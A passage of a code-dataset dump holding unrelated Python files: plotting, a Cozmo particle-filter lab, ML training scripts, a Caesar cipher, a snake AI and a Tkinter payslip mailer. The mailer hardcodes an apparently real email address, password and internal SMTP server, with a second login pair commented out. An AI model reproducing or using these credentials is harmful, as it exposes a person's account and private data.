rotation=90,ha='center',va='center')\nax1.annotate(r'\\textbf{2005-2019}',xy=(0,0),xytext=(-7.3,0.5),\n textcoords='axes fraction',color='k',fontsize=10,\n rotation=90,ha='center',va='center')\n \n###############################################################################\ncbar_ax1 = fig.add_axes([0.36,0.11,0.3,0.03]) \ncbar1 = fig.colorbar(cs1,cax=cbar_ax1,orientation='horizontal',\n extend='max',extendfrac=0.07,drawedges=False)\ncbar1.set_label(label,fontsize=9,color='dimgrey',labelpad=0.7) \ncbar1.set_ticks(barlim)\ncbar1.set_ticklabels(list(map(str,barlim)))\ncbar1.ax.tick_params(axis='x', size=.01,labelsize=5)\ncbar1.outline.set_edgecolor('dimgrey')\n\nplt.tight_layout()\nplt.subplots_adjust(hspace=0.01,wspace=0.02,bottom=0.17,top=0.90)\n\nif scaleLRPmax == True:\n plt.savefig(directoryfigure + 'MS-Figure_5b_v1_scaleLRP.png',dpi=1000)\nelse:\n plt.savefig(directoryfigure + 'MS-Figure_5b_v1.png',dpi=1000)","sub_path":"Scripts/plot_MS-FIGURE_5b_v1.py","file_name":"plot_MS-FIGURE_5b_v1.py","file_ext":"py","file_size_in_byte":4482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"501875073","text":"from collections import OrderedDict\n\n\ndef group_by(stream, field, success=None):\n '''Function calculates the number of years\n or months for given parameters\n '''\n short_line_length = 119\n results_dict = {}\n with stream as f:\n status = 'S' if success is True else 'F'\n header = f.readline()\n suc_index = header.index('Suc')\n year_index = header.index('Launch Date')\n mounth_index = header.index('Launch Date')+5\n next(f)\n for line in f:\n if len(line) > short_line_length:\n status_in_line = line[suc_index:suc_index+1]\n if field == 'mounth':\n field_in_line = line[mounth_index:mounth_index+3]\n else:\n field_in_line = line[year_index:year_index+4]\n if status_in_line == status or success is None:\n try:\n results_dict[field_in_line] += 1\n except:\n results_dict[field_in_line] = 1\n elif status_in_line == status or success is None:\n results_dict[field_in_line] += 1\n results_dict = OrderedDict(sorted(results_dict.items()))\n return results_dict\nresults = group_by(open(\"launchlog.txt\"), 'mounth', False)\nprint('Results:')\nfor field in results:\n print('{key} : {value}'.format(key=field, value=results[field]))\n","sub_path":"task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":1407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"82968898","text":"## If you run into an \"[NSApplication _setup] unrecognized selector\" problem on macOS,\n## try uncommenting the following snippet\n\n# try:\n# import matplotlib\n# matplotlib.use('TkAgg')\n# except ImportError:\n# pass\n\n#BRIAN ZHU AND MIGUEL GARCIA\n\nfrom skimage import color\nimport cozmo\nimport numpy as np\nfrom numpy.linalg import inv\nimport threading\nimport time\nimport sys\nimport asyncio\nfrom PIL import Image\n\nfrom markers import detect, annotator\n\nfrom grid import CozGrid\nfrom gui import GUIWindow\nfrom particle import Particle, Robot\nfrom setting import *\nfrom particle_filter import *\nfrom utils import *\nfrom cozmo.util import degrees, distance_mm, speed_mmps, Pose, Angle\nfrom math import atan2\n\n#particle filter functionality\nclass ParticleFilter:\n\n def __init__(self, grid):\n self.particles = Particle.create_random(PARTICLE_COUNT, grid)\n self.grid = grid\n\n def update(self, odom, r_marker_list):\n\n # ---------- Motion model update ----------\n self.particles = motion_update(self.particles, odom)\n\n # ---------- Sensor (markers) model update ----------\n self.particles = measurement_update(self.particles, r_marker_list, self.grid)\n\n # ---------- Show current state ----------\n # Try to find current best estimate for display\n m_x, m_y, m_h, m_confident = compute_mean_pose(self.particles)\n return (m_x, m_y, m_h, m_confident)\n\n# tmp cache\nprev_pose = cozmo.util.Pose(0, 0, 0, angle_z=cozmo.util.Angle(degrees=0))\npicked_up_flag = False\n\n# goal location for the robot to drive to, (x, y, theta)\ngoal = (6,10,0)\n\n# map\nMap_filename = \"map_arena.json\"\ngrid = CozGrid(Map_filename)\ngui = GUIWindow(grid, show_camera=True)\npf = ParticleFilter(grid)\n\ndef compute_odometry(curr_pose, cvt_inch=True):\n '''\n Compute the odometry given the current pose of the robot (use robot.pose)\n\n Input:\n - curr_pose: a cozmo.robot.Pose representing the robot's current location\n - cvt_inch: converts the odometry into grid units\n Returns:\n - 3-tuple (dx, dy, dh) representing the odometry\n '''\n\n global prev_pose, picked_up_flag\n last_x, last_y, last_h = prev_pose.position.x, prev_pose.position.y, \\\n prev_pose.rotation.angle_z.degrees\n curr_x, curr_y, curr_h = curr_pose.position.x, curr_pose.position.y, \\\n curr_pose.rotation.angle_z.degrees\n \n dx, dy = rotate_point(curr_x-last_x, curr_y-last_y, -last_h)\n if cvt_inch:\n dx, dy = dx / grid.scale, dy / grid.scale\n\n return (dx, dy, diff_heading_deg(curr_h, last_h))\n\n\nasync def marker_processing(robot, camera_settings, show_diagnostic_image=False):\n '''\n Obtain the visible markers from the current frame from Cozmo's camera. \n Since this is an async function, it must be called using await, for example:\n\n markers, camera_image = await marker_processing(robot, camera_settings, show_diagnostic_image=False)\n\n Input:\n - robot: cozmo.robot.Robot object\n - camera_settings: 3x3 matrix representing the camera calibration settings\n - show_diagnostic_image: if True, shows what the marker detector sees after processing\n Returns:\n - a list of detected markers, each being a 3-tuple (rx, ry, rh) \n (as expected by the particle filter's measurement update)\n - a PIL Image of what Cozmo's camera sees with marker annotations\n '''\n\n global grid\n\n # Wait for the latest image from Cozmo\n image_event = await robot.world.wait_for(cozmo.camera.EvtNewRawCameraImage, timeout=30)\n\n # Convert the image to grayscale\n image = np.array(image_event.image)\n image = color.rgb2gray(image)\n \n # Detect the markers\n markers, diag = detect.detect_markers(image, camera_settings, include_diagnostics=True)\n\n # Measured marker list for the particle filter, scaled by the grid scale\n marker_list = [marker['xyh'] for marker in markers]\n marker_list = [(x/grid.scale, y/grid.scale, h) for x,y,h in marker_list]\n\n # Annotate the camera image with the markers\n if not show_diagnostic_image:\n annotated_image = image_event.image.resize((image.shape[1] * 2, image.shape[0] * 2))\n annotator.annotate_markers(annotated_image, markers, scale=2)\n else:\n diag_image = color.gray2rgb(diag['filtered_image'])\n diag_image = Image.fromarray(np.uint8(diag_image * 255)).resize((image.shape[1] * 2, image.shape[0] * 2))\n annotator.annotate_markers(diag_image, markers, scale=2)\n annotated_image = diag_image\n\n return marker_list, annotated_image\n\n\nasync def run(robot: cozmo.robot.Robot):\n global picked_up_flag, prev_pose\n global grid, gui, pf\n\n # start streaming\n robot.camera.image_stream_enabled = True\n robot.camera.color_image_enabled = False\n robot.camera.enable_auto_exposure()\n await robot.set_head_angle(cozmo.util.degrees(0)).wait_for_completed()\n await robot.set_lift_height(0).wait_for_completed()\n\n # Obtain the camera intrinsics matrix\n fx, fy = robot.camera.config.focal_length.x_y\n cx, cy = robot.camera.config.center.x_y\n camera_settings = np.array([\n [fx, 0, cx],\n [ 0, fy, cy],\n [ 0, 0, 1]\n ], dtype=np.float)\n \n ###################\n\n # YOUR CODE HERE\n start_time = time.time()\n has_converged = False\n converged_score = 0\n arrived_to_goal = False\n\n while True:\n\n if arrived_to_goal and not robot.is_picked_up:\n await robot.drive_wheels(0.0, 0, 0)\n\n #kidnapped\n if robot.is_picked_up:\n picked_up_flag = False\n arrived_to_goal = False\n has_converged = False\n converged_score = 0\n await robot.drive_wheels(0.0, 0, 0)\n await robot.play_anim_trigger(cozmo.anim.Triggers.CodeLabDejected).wait_for_completed()\n\n while robot.is_picked_up:\n await robot.drive_wheels(0.0, 0, 0)\n\n prev_pose = cozmo.util.Pose(0, 0, 0, angle_z=cozmo.util.Angle(degrees=0))\n pf.particles = Particle.create_random(PARTICLE_COUNT, grid)\n\n continue\n\n\n #INFORMATION UPDATE\n curr_pose = robot.pose\n odom = compute_odometry(curr_pose, cvt_inch=True)\n prev_pose = robot.pose\n marker_list, annotated_image = await marker_processing(robot, camera_settings, show_diagnostic_image=False)\n\n #PF\n (mean_x, mean_y, mean_h, mean_confidence) = pf.update(odom, marker_list)\n\n gui.show_particles(pf.particles)\n gui.show_mean(mean_x, mean_y, mean_h)\n gui.show_camera_image(annotated_image)\n gui.updated.set()\n\n #pf returns convergence\n if mean_confidence:\n converged_score += 2.5\n\n # converged and confident of it\n if converged_score >= 25:\n has_converged = True\n\n #if pf converged but then diverged again\n if has_converged and not mean_confidence:\n converged_score -= 1.5\n\n # if the pf diverges a lot, then reset\n if converged_score < 0:\n has_converged = False\n converged_score = 0\n\n temp_score = 1 + converged_score / 10\n await robot.drive_wheels(15.0 / temp_score, -15.0 / temp_score)\n\n if has_converged:\n await robot.drive_wheels(0.0, 0, 0)\n goal_x = goal[0]\n goal_y = goal[1]\n goal_h = goal[2]\n\n d_x = goal_x - mean_x\n d_y = goal_y - mean_y\n\n target = atan2(d_y, d_x) * 180.0 / 3.14159\n\n initial_degree = diff_heading_deg(target, mean_h)\n zero_degree = diff_heading_deg(goal_h, target)\n distance = grid_distance(mean_x, mean_y, goal_x, goal_y)\n\n # turn to the right angle\n await robot.turn_in_place(degrees(int(initial_degree * 0.95))).wait_for_completed()\n # drive to the goal\n await robot.drive_straight(distance_mm(distance * grid.scale * 0.95), speed_mmps(50)).wait_for_completed()\n # turn to zero degrees\n await robot.turn_in_place(degrees(int(zero_degree * 0.975))).wait_for_completed()\n # be happy!\n await robot.play_anim_trigger(cozmo.anim.Triggers.CodeLabHappy).wait_for_completed()\n\n arrived_to_goal = True\n else:\n # if there is no convergence, keep turning in place\n if ((time.time() - start_time) // 1) % 8 < 3 or len(marker_list) <= 0:\n await robot.drive_wheels(12.0, -12, 0)\n elif len(marker_list) > 0:\n markers_loc = marker_list[0][0]\n if markers_loc > 12:\n await robot.drive_wheels(35.0, 35, 0)\n if markers_loc < 8:\n await robot.drive_wheels(-35.0, -35, 0)\n else:\n await robot.drive_wheels(0.0, 0, 0)\n\n ###################\n\nclass CozmoThread(threading.Thread):\n \n def __init__(self):\n threading.Thread.__init__(self, daemon=False)\n\n def run(self):\n cozmo.robot.Robot.drive_off_charger_on_connect = False # Cozmo can stay on his charger\n cozmo.run_program(run, use_viewer=False)\n\n\nif __name__ == '__main__':\n\n # cozmo thread\n cozmo_thread = CozmoThread()\n cozmo_thread.start()\n\n # init\n gui.show_particles(pf.particles)\n gui.show_mean(0, 0, 0)\n gui.start()\n\n","sub_path":"Lab 4/Lab4_Release/go_to_goal_cozmo.py","file_name":"go_to_goal_cozmo.py","file_ext":"py","file_size_in_byte":9382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"88608456","text":"from tkinter import *\nimport smtplib\nimport email.mime.multipart \nfrom email.mime.text import MIMEText\nimport xlrd\nimport win32ui\ndef sendmail():\n\t\n\t#登陆邮箱 \n\thead=t4.get()\n\tsubject=t5.get()\n\tfmail='changnl@chinaunicom.cn'\n\tpsd='CNLcw198608'\n\tsmtp=smtplib \n\tsmtp=smtplib.SMTP() \n\tsmtp.connect('10.11.158.13','25')\n\tsmtp.starttls() \n\t#smtp.login('lixf311@chinaunicom.cn','2676518aA')\n\tsmtp.login(fmail,psd)\n\t\n\t#print (head)\n\t#print (subject)\n\t#读取表格sheet1\n\t#path=input('输入邮件明细地址')\n\t#book=xlrd.open_workbook(r\"d:\\201601.xlsx\")\n\tbook=xlrd.open_workbook(path)\n\tsh = book.sheet_by_index(0)\n\tcx=sh.ncols-1\n\t#编辑邮件\n\t#msg=email.mime.multipart.MIMEMultipart()\n\t#head=input('输入邮件头部内容')\n\t#subject=input('输入邮件的主题') \n\tL= range(sh.nrows)\n\tfor rx in L[1:]:\n\t\tmail=sh.cell_value(rx,cx)\n\t\thtml='

'+head+'

'\n\t\tfor cl in range(sh.ncols-1):\n\t\t\thtml=html+''\n\t\thtml=html+''\n\t\tfor dl in range(sh.ncols-1):\n\t\t\tif type(sh.cell_value(rx,dl))==float :\n\t\t\t\thtml=html+''\n\t\t\telse :\n\t\t\t\thtml=html+''\n\t\thtml=html+'
'+str(sh.cell_value(0,cl))+'
'+str(round(sh.cell_value(rx,dl),2))+''+str(sh.cell_value(rx,dl))+'
'\n\t\tmsg = MIMEText(html,'html','utf-8') \n\t\tmsg['from']=fmail\n\t\tmsg['to']=mail \n\t\t#msg['subject']='测试工资条'\n\t\tmsg['subject']=subject\n\t\tsmtp.sendmail(fmail,mail,msg.as_string())\n\t\tprint (mail,'邮件发送成功') \n\t\t#print (html) \n\tsmtp.quit() \ndef openfile():\n\tdlg = win32ui.CreateFileDialog(1) # 1表示打开文件对话框\n\tdlg.SetOFNInitialDir('C:/') # 设置打开文件对话框中的初始显示目录\n\tdlg.DoModal()\n\tfilename = dlg.GetPathName() # 获取选择的文件名称\n\treturn filename\nroot=Tk()\n\nLabel(root,text='输入发送邮箱',width=50).pack()\n\nt1=StringVar()\ne1 = Entry(root,textvariable = t1,width=45)\ne1.pack()\n\nLabel(root,text='输入邮箱密码',width=50).pack()\n\nt2=StringVar()\ne2 = Entry(root,textvariable = t2,width=45,show='*')\ne2.pack()\n\nLabel(root,text='execl文件',width=50).pack()\n\n#Button(root,text='打开文件',command=openfile,width=10,height=2).pack()\n#t3=StringVar()\nt3=openfile()\ne3 = Label(root,text =t3,width=45)\n#t3=openfile()\ne3.pack()\npath=t3\n\nLabel(root,text='输入邮件头部文字内容',width=50).pack()\n\nt4=StringVar()\ne4 = Entry(root,textvariable = t4,width=45)\n#t4.set('输入邮件头部文字内容')\ne4.pack()\nhead=t4.get()\n\nLabel(root,text='输入邮件的主题',width=50).pack()\nt5=StringVar()\ne5 = Entry(root,textvariable = t5,width=45)\n#t5.set('输入邮件的主题')\ne5.pack()\nsubject=t5.get()\n\nButton(root,text='发送邮件',command=sendmail,width=10,height=2).pack()\n\nmainloop()","sub_path":"python/2cs.py","file_name":"2cs.py","file_ext":"py","file_size_in_byte":2698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"109325123","text":"# -*- coding: utf-8 -*-\nimport logging\n\nimport coloredlogs\n\nfrom Coach import Coach\nfrom graph.graphGame import graphGame as Game\nfrom graph.pytorch.NNet import NNetWrapper as nn\nfrom utils import *\n\nlog = logging.getLogger(__name__)\n\ncoloredlogs.install(level='INFO') # Change this to DEBUG to see more info.\n\nargs = dotdict({\n 'numIters': 1000,\n 'numEps': 50, # Number of complete self-play games to simulate during a new iteration.\n 'maxlenOfEps': 40, # Max number of steps in an episode\n 'removal':10, # Blocker's removal limit\n 'remCost':0, # Cost of removing one edge\n 'tempThreshold': 15, #\n 'updateThreshold': 0.5, # During arena playoff, new neural net will be accepted if threshold or more of games are won.\n 'maxlenOfQueue': 200000, # Number of game examples to train the neural networks.\n 'numMCTSSims': 25, # Number of games moves for MCTS to simulate.\n 'arenaCompare': 40, # Number of games to play during arena play to determine if new net will be accepted.\n 'cpuct': 1,\n\n 'checkpoint': './temp0716/',\n 'load_model': False,\n 'load_folder_file': ('/dev/models/8x100x50','best.pth.tar'),\n 'numItersForTrainExamplesHistory': 20,\n\n})\n\n\ndef main():\n log.info('Loading %s...', Game.__name__)\n goal_position = [9,9]\n g = Game(10,10,goal_position)\n\n log.info('Loading %s...', nn.__name__)\n rnnet = nn(g,1) # Neural network for the runner\n bnnet = nn(g,-1) # Neural network for the blocker\n\n if args.load_model:\n log.info('Loading checkpoint \"%s/%s\"...', args.load_folder_file)\n nnet.load_checkpoint(args.load_folder_file[0], args.load_folder_file[1])\n else:\n log.warning('Not loading a checkpoint!')\n\n log.info('Loading the Coach...')\n c = Coach(g, rnnet, bnnet, args)\n\n if args.load_model:\n log.info(\"Loading 'trainExamples' from file...\")\n c.loadTrainExamples()\n\n log.info('Starting the learning process 🎉')\n c.learn()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"238701780","text":"from unittest import TestCase\nfrom mock import Mock, patch\nfrom hackernews_api import HackerNewsAPI\nfrom requests import get\n\nclass TestHackerNewsAPI(TestCase):\n def test_get_top_stories(self):\n hackernews = HackerNewsAPI(0)\n self.assertEqual(len(hackernews.get_top_stories()), 0)\n\n hackernews = HackerNewsAPI(5)\n self.assertLessEqual(len(hackernews.get_top_stories()), 5)\n\n hackernews = HackerNewsAPI(550)\n self.assertLessEqual(len(hackernews.get_top_stories()), 500)\n\n def test_get_item(self):\n with patch('hackernews_api.get') as fake_get:\n hackernews = HackerNewsAPI(0)\n \n fake_get.return_value.status_code = 200\n result = hackernews.get_item(0) \n self.assertIsNotNone(result)\n\n fake_get.return_value.status_code = 404\n result = hackernews.get_item(0) \n self.assertIsNone(result)","sub_path":"tests/test_hackernews_api.py","file_name":"test_hackernews_api.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"400471683","text":"# Let's say you have a CSV datafile:\n\ndataFile = \"\"\"\n\"entry1\",2,3.6\n\"boots\",5,1.7\n\"slack\",1,2.6\n\"triffid\",11,-1.5\n\"\"\"\n\n# The data needs to be sorted numerically by the second column.\n# How would you go about sorting the entries and dumping the\n# newly sorted data?\n\ndef process(dataFile):\n dataSet = dataFile.splitlines()\n dataSet.remove('')\n output = []\n for data in dataSet:\n output.append(data.split(\",\")) # [\"entry1\",2,3.6]\n output.sort(key=lambda x:int(x[1]))\n result = \" \".join(str(data) for data in output)\n\n print (result)\n\n\nprocess(dataFile)\n","sub_path":"Interview/Apple/sortData.py","file_name":"sortData.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"352319560","text":"def codage(mot: str, decalage: int) -> str:\n \"\"\"\n Permet de chiffrer une chaîne de caractères mot avec le code de césar en utilisant un décalage défini\n :param mot: str\n :param decalage: int\n :return: str\n \"\"\"\n result = \"\"\n for c in mot:\n result += convertir(c, decalage)\n return result\n\n\ndef convertir(lettre: str, decalage: int) -> str:\n \"\"\"\n Convertis un caractère avec le code de césar\n :param lettre: str[1]\n :param decalage: int\n :return: Le caractère déplacé de decalage éléments dans la table ASCII\n \"\"\"\n c = ord(lettre)\n if 96 < c < 123:\n if c + decalage > 122:\n decalage = 97 + (c + decalage - 122) - 123\n elif 64 < c < 91:\n if c + decalage > 90:\n decalage = 65 + (c + decalage - 90) - 91\n else:\n decalage = 0\n\n return chr(c + decalage)\n\n\nprint(codage('Vive la NSI !', 4))\n","sub_path":"confinement/novembre/20/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"576961169","text":"import tensorflow as tf\nimport numpy as np\nfrom tensorflow.contrib.layers import xavier_initializer_conv2d\nfrom tensorflow.contrib.layers import xavier_initializer\n\n\n\ndef Network_LSTM(input, keep_prob, output_dim, scope_name = \"LSTM\", n_hidden=128, n_features=128, is_training=False):\n with tf.variable_scope(scope_name, reuse=tf.AUTO_REUSE) as scope:\n cells = [tf.nn.rnn_cell.BasicRNNCell(n_hidden) for layer in range(3)]\n cells_drop = [tf.nn.rnn_cell.DropoutWrapper( cell, input_keep_prob=keep_prob,state_keep_prob=keep_prob) for cell in cells]\n #cell2 = tf.nn.rnn_cell.BasicLSTMCell(n_hidden,name=\"cell2\")\n #cell3 = tf.nn.rnn_cell.BasicLSTMCell(n_hidden,name=\"cell3\")\n\n multi_cell = tf.nn.rnn_cell.MultiRNNCell(cells_drop)\n outputs,states = tf.nn.dynamic_rnn(multi_cell,input,dtype=tf.float32)\n outputs_features = tf.transpose(outputs,[1,0,2])\n outputs_features = outputs_features[-1]\n\n outputs_features = tf.layers.dense(outputs_features,units=n_features,activation = tf.nn.relu)\n logits = tf.layers.dense(outputs_features,units=output_dim,activation = None)\n outputs = tf.layers.dense(outputs_features,units=output_dim,activation = None)\n return outputs, logits\n\n\nif __name__ == \"__main__\":\n duration, input_dim, output_dim = 50,1,1\n input = tf.placeholder(tf.float32, shape=[None, duration, input_dim]) # None,step,input\n Network_LSTM(input,output_dim)","sub_path":"Police/Police/modules/network_lstm.py","file_name":"network_lstm.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"401441565","text":"from const import * #使用常量\nfrom board import * # 导入棋盘类\nimport copy\n\n# 人工智能算法类\nclass Algorithm:\n # 构造器 传入棋盘对象 构件一个实际棋盘和一个虚拟棋盘\n def __init__(self, board):\n self.board = board\n\n # 根据食物位置 蛇头位置 蛇身的状态决定移动的方向\n def findDirection(self):\n return \"down\"\n\n # 在各种方案都不行时,随便找一个可行的方向来走(1步),\n def any_possible_move(self):\n best_move = \"none\"\n self.board.board_reset()\n self.board.board_refresh()\n\n min = const.UNDEFINED\n dir = [\"left\", \"up\", \"right\", \"down\"]\n for i in range(4):\n # 判断这个点是否能往这个方向移动(去寻找食物)\n if self.board.is_move_possible(self.board.head, dir[i]):\n # 如果可以移动 则直接使用该方向了\n best_move = dir[i]\n break\n \n return best_move\n\n # 根据食物位置 蛇头位置 蛇身的状态决定移动的方向\n def findDirection(self):\n best_move = self.choose_shortest_safe_move()\n if best_move == \"none\":\n \tbest_move = self.any_possible_move()\n \n #return \"down\"\n return best_move # 真的来了啊\n\n \n # 从蛇头开始,根据board中元素值,\n # 从蛇头周围4个领域点中选择最短路径\n # 确保移动后蛇头与食物的欧氏距离比移动前的要小即可\n # 返回值为\"left\" \"right\" \"up\" \"down\" \"none\"之一\n def choose_shortest_safe_move(self, board = None):\n # 创建虚拟的棋盘 该棋盘可能来源于真实的棋盘 也可能来源于虚拟生成的棋盘\n if board:\n tmpboard = copy.deepcopy(board)\n else:\n tmpboard = copy.deepcopy(self.board)\n \n best_move = \"none\"\n dir = [\"left\", \"up\", \"right\", \"down\"]\n for i in range(4):\n # 判断这个点是否能往这个方向移动(去寻找食物)\n if tmpboard.is_move_possible(tmpboard.head, dir[i]):\n # 移动后的点\n next = tmpboard.move(tmpboard.head, dir[i])\n # 判断移动后的点与食物的距离是否比移动前的点与食物的距离要小\n if manhattan_distance(next, tmpboard.food) < manhattan_distance(tmpboard.head, tmpboard.food):\n # 判断两个点之间是否有障碍(蛇尾)无法直接通过曼哈顿距离到达\n if not tmpboard.is_obstacle_between(next, tmpboard.food):\n best_move = dir[i]\n break\n \n return best_move\n \n\n\n\n\n","sub_path":"HungrySneak/algorithm.py","file_name":"algorithm.py","file_ext":"py","file_size_in_byte":2718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"111326452","text":"import sys\nimport urllib2\nfrom bs4 import BeautifulSoup\n\ndef parselMG(content):\n imgset=set()\n soup = BeautifulSoup(content)\n for url in soup.findAll('img'):\n x = url.get('src','')\n imgset.add(x)\n return imgset\n\ndef write_outputs(urls, filename):\n with open(filename, 'w') as f:\n for url in urls:\n f.write(url)\n f.write('\\n')\n\ndef main():\n url = 'http://www.baidu.com'\n #url = 'http://www.sjtu.edu.cn'\n if len(sys.argv) > 1:\n url = sys.argv[1]\n content = urllib2.urlopen(url).read()\n urls_2=parselMG(content)\n\n write_outputs(urls_2, 'res2.txt')\n\nif __name__ == '__main__':\n main()","sub_path":"1/work_2.py","file_name":"work_2.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"400266969","text":"\"\"\" Utilities for detecting outliers\r\n\r\nThese functions take a vector of values, and return a boolean vector of the\r\nsame length as the input, where True indicates the corresponding value is an\r\noutlier.\r\n\"\"\"\r\n\r\n# Python 2 compatibility\r\nfrom __future__ import print_function, division\r\n\r\n# Any imports you need\r\n# LAB(begin solution)\r\nimport numpy as np\r\n# LAB(replace solution)\r\n# +++your code here+++\r\n# LAB(end solution)\r\n\r\n\r\ndef iqr_detector(measures, iqr_proportion=1.5):\r\n \"\"\" Detect outliers in `measures` using interquartile range.\r\n\r\n Returns a boolean vector of same length as `measures`, where True means the\r\n corresponding value in `measures` is an outlier.\r\n\r\n Call Q1, Q2 and Q3 the 25th, 50th and 75th percentiles of `measures`.\r\n\r\n The interquartile range (IQR) is Q3 - Q1.\r\n\r\n An outlier is any value in `measures` that is either:\r\n\r\n * > Q3 + IQR * `iqr_proportion` or\r\n * < Q1 - IQR * `iqr_proportion`.\r\n\r\n See: https://en.wikipedia.org/wiki/Interquartile_range\r\n\r\n Parameters\r\n ----------\r\n measures : 1D array\r\n Values for which we will detect outliers\r\n iqr_proportion : float, optional\r\n Scalar to multiply the IQR to form upper and lower threshold (see\r\n above). Default is 1.5.\r\n\r\n Returns\r\n -------\r\n outlier_tf : 1D boolean array\r\n A boolean vector of same length as `measures`, where True means the\r\n corresponding value in `measures` is an outlier.\r\n \"\"\"\r\n # Any imports you need\r\n # LAB(begin solution)\r\n q1, q3 = np.percentile(measures, [25, 75])\r\n iqr = q3 - q1\r\n up_thresh = q3 + iqr * iqr_proportion\r\n down_thresh = q1 - iqr * iqr_proportion\r\n return np.logical_or(measures > up_thresh, measures < down_thresh)\r\n # LAB(replace solution)\r\n # Hints:\r\n # * investigate np.percentile\r\n # * You'll likely need np.logical_or\r\n # +++your code here+++\r\n # LAB(end solution)\r\n","sub_path":"solutions/detectors.py","file_name":"detectors.py","file_ext":"py","file_size_in_byte":1929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"17894812","text":"import frappe\n\ndef validate(doc,method):\n\ttotal=0\n\tfor d in doc.get('taxes'):\n\t\ttotal+=round(d.tax_amount)\n\t\td.tax_amount=round(d.tax_amount)\n\ndef on_create_gl_entry(doc,method):\n\tif doc.get('voucher_type')==\"Purchase Invoice\" :\n\t\tsi=frappe.get_doc('Purchase Invoice',doc.get('voucher_no'))\n\t\tfor d in si.get('taxes'):\n\t\t\tif d.account_head==doc.account:\n\t\t\t\tfrappe.db.set_value(doc.doctype,doc.name,'credit',d.tax_amount)\n\t\t\t\tfrappe.db.set_value(doc.doctype,doc.name,'credit_in_account_currency',d.tax_amount)","sub_path":"homzhub_customization/homzhub_customization/doctype/purchase_invoice.py","file_name":"purchase_invoice.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"435515222","text":"\"\"\"\nCombined Structural variation callset from both DELLY and MANTA\n\n\"\"\"\n\nimport argparse\nimport re\nimport os\nimport subprocess\nimport shlex\n\n\ndef argument_parser():\n \"\"\"parses argument passed on from command line\"\"\"\n parser = argparse.ArgumentParser(\n description='Writes a configuration file for Circos Plot from .circosData inputs')\n\n\n parser.add_argument('--cnv', required=True, help='CNV circosData')\n parser.add_argument('--sv', required=True, help='SV circosData')\n parser.add_argument('--sampleName', required=True, help='Sample name prefix for output configuration file')\n parser.add_argument('-o', '--outputDIR', required=False, default=os.getcwd())\n parser.add_argument('-t', '--template', required=True, help='Template configuration file')\n parser.add_argument('--vaf', required=True, help='SNV Vaf circosData')\n parser.add_argument('--rainfall', required=True, help='SNV Rainfall circosData')\n\n args = vars(parser.parse_args())\n\n outputDIR = args['outputDIR']\n sampleName = args['sampleName']\n sv = args['sv']\n cnv = args['cnv']\n template = args['template']\n rainfall = args['rainfall']\n vaf = args['vaf']\n return sv, cnv, outputDIR, sampleName, template, rainfall, vaf\n\n\ndef create_configuration(template, sv, cnv, snv_vaf, snv_rainfall, circosConfig, circosPlot):\n \"\"\"read in template file, \n substitue , , , , to respective file names\"\"\"\n with open(template, 'r') as f:\n with open(circosConfig, 'w') as g:\n for line in f:\n if re.search(string=line, pattern=r'') != None:\n replaced_line = re.sub(string=line, pattern=r'', repl=circosPlot)\n elif re.search(string=line, pattern=r'') != None:\n replaced_line = re.sub(string=line, pattern=r'', repl=sv)\n elif re.search(string=line, pattern=r'') != None:\n replaced_line = re.sub(string=line, pattern=r'', repl=cnv)\n elif re.search(string=line, pattern=r'', repl=snv_vaf)\n elif re.search(string=line, pattern=r'', repl=snv_rainfall)\n else:\n replaced_line = line \n \n g.write(replaced_line)\n\n\n\ndef main():\n sv, cnv, outputDIR, sampleName, template, rainfall, vaf = argument_parser()\n\n circosConfig= os.path.join(outputDIR, sampleName + '.conf')\n circosPlot = os.path.join(outputDIR, sampleName + '.circosPlot.png')\n create_configuration(template, sv, cnv, vaf, rainfall, circosConfig, circosPlot)\n print(f'Output Circos Configuration file is written: {circosConfig}')\n return 0\n\nif __name__=='__main__':\n main()\n\n","sub_path":"circosConfigPrep.py","file_name":"circosConfigPrep.py","file_ext":"py","file_size_in_byte":3036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"290400564","text":"\"\"\"\nThis tutorial aims at demonstrating the impressive loading speed that allowed by trainer,\neven on its (possibly) complex data structure!\n\"\"\"\n\nfrom sqlalchemy.orm import joinedload, subqueryload\nfrom tqdm import tqdm\n\nimport trainer.lib as lib\nimport trainer.lib.demo_data as demo_data\nimport trainer.ml as ml\nfrom trainer.ml.torch_utils import bench_mark_dataset\n\n\ndef benchmark_mnist():\n ds = sess.query(lib.Dataset).filter(lib.Dataset.name == 'mnist').first()\n if ds is None:\n ds = sd.build_mnist(sd)\n\n split_old = sess.query(lib.Split).options(subqueryload(lib.Split.sbjts)).first()\n split = sess.query(lib.Split).options(\n joinedload(lib.Split.sbjts).joinedload(lib.Subject.ims, innerjoin=True)\n ).filter(lib.Split.name == \"train\").first()\n print(split.name)\n\n mnist_res = bench_mark_dataset(sd.mnist_train, lambda t: (t[0].size, t[1]))\n trainer_res = bench_mark_dataset(split, lambda s: 